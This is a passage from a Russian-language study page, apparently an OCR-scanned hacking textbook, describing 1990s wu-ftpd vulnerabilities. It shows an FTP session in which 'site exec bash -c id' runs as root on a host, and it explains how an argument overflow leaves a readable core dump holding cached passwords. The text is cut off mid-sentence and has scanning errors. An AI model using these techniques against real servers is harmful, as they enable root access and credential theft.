Студопедия.Орг Главная | Случайная страница | Контакты | Мы поможем в написании вашей работы!  
 

Выполнить любую команду от имени суперпользователя, причем для удобства



Кракера в wu-ftp есть специальная команда, которая так и называется site

exec (выполнить на сайте) evil" ftp victim.com

220 victim FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)

Ready.

Name (victim: root): good

Password required for good.

Password: *****

User good logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp" quote "site exec bash -c id"

Bash -с id

200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users)

groups^lOO(users)

200 (end of' bash-c id')

Видно, что в последней строчке па удаленном хосте выполнилась коман- _ да

Id от имени суперпользователя, это означает, что хост уязвим..

Другая уязвимость, которой подвержены версии wu-ftpd (1996-1997 гг.),

Состояла в том, что при определенных условиях можно переполнить список

Аргументов команды, а это приведет к сбросу демоном аварийного дампа

Памяти. Для этого нужны минимальные полномочия анонимного пользователя

Ftp. Самое интересное, владельцем дампа будет не root, как обычно бывает,

A anonymous, и дамп будет сбрасываться в его домашний каталог. Отсюда

Следует, что он позже может быть прочитан удаленно. Ну а чтение аварийного

Дамeна равносильно копанию в корзине для бумаг на секретном объекте -

Среди мусора находятся очень любопытные вещи, например сброшенные

Кэшированные пароли. Так что злоумышленнику останется только запустить





Дата публикования: 2014-11-04; Прочитано: 308 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!



studopedia.org - Студопедия.Орг - 2014-2024 год. Студопедия не является автором материалов, которые размещены. Но предоставляет возможность бесплатного использования (0.01 с)...